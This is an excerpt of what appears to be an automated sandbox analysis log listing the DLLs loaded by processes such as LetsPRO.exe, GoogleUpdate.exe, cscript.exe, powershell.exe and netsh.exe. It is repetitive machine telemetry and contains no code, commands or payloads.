                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wldp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: netapi32.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: version.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: userenv.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msimg32.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wininet.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: netutils.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: mdmregistration.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: omadmapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dmcmnutils.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: iri.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dsreg.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: profapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: cscapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: msxml3.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: atlthunk.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: textshaping.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: webio.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: schannel.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: propsys.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: edputil.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: appresolver.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: slc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: sppc.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\cscript.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
